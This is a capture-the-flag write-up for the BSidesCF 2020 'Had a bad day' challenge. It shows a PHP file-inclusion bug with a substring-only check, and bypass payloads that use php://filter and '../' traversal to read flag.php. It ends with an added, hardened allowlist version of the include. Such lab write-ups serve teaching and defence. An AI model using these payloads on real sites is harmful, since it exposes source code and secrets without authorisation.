  • BUUCTF-[BSidesCF 2020]Had a bad day (file inclusion)

    Open the target; the page has 2 buttons.

    Clicking a button changes the URL.

    Try the php://filter pseudo-protocol to read the source of index.php:

    php://filter/read=convert.base64-encode/resource=index.php


    That returns an error, so drop the .php suffix (the include appends it itself).
    Base64-decode the output to get index.php:

    <?php
    	// The category name is taken straight from the query string
    	$file = $_GET['category'];
    	if(isset($file)){
    		// Substring check only: any value that merely contains "woofers" or "meowers" passes
    		if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index"))
    		{
    			// The user-controlled string reaches include() with ".php" appended
    			include ($file . '.php');
    		}
    		else{
    			echo "Sorry, we currently only support woofers and meowers.";
    		}
    	}
    ?>
    

    Read flag.php directly with ?category=woofers/../flag. The page looks unchanged, but pressing F12
    shows extra content in the page source, so flag.php really was included.



    !!! Nest the php://filter pseudo-protocol, wrapping a path segment that satisfies the $file check:
    php://filter/read=convert.base64-encode/woofers/resource=flag
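    As an added example that is not part of the original writeup or the challenge's code, here is a hardened form of the same include logic: the substring check is replaced by a strict allowlist, so a value that merely contains "woofers" (a traversal segment or a php://filter wrapper) is rejected before anything reaches include(). The three page names come from the challenge source; the fixed directory is an assumption.

```php
<?php
// Added example (not the challenge's code): hardened category include.

/**
 * Map a user-supplied category to a file path, or return null if it is
 * not one of the known pages. Assumes the pages live next to this script.
 */
function resolve_category(?string $category): ?string
{
    // Strict allowlist: the value must be exactly one of these names.
    // in_array(..., true) compares with ===, so no type juggling.
    $allowed = ['woofers', 'meowers', 'index'];
    if ($category === null || !in_array($category, $allowed, true)) {
        return null;
    }
    // The path is built from a fixed directory and an allowlisted name;
    // no user-controlled substring, wrapper or "../" can end up in it.
    return __DIR__ . '/' . $category . '.php';
}

$path = resolve_category($_GET['category'] ?? null);
if ($path === null) {
    // Same message as the original, but now reached for every non-allowlisted value,
    // e.g. "woofers/../flag" or "php://filter/.../woofers/resource=flag".
    echo "Sorry, we currently only support woofers and meowers.";
} else {
    include $path;
}
```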

  • Original address: https://www.cnblogs.com/wrnan/p/12860233.html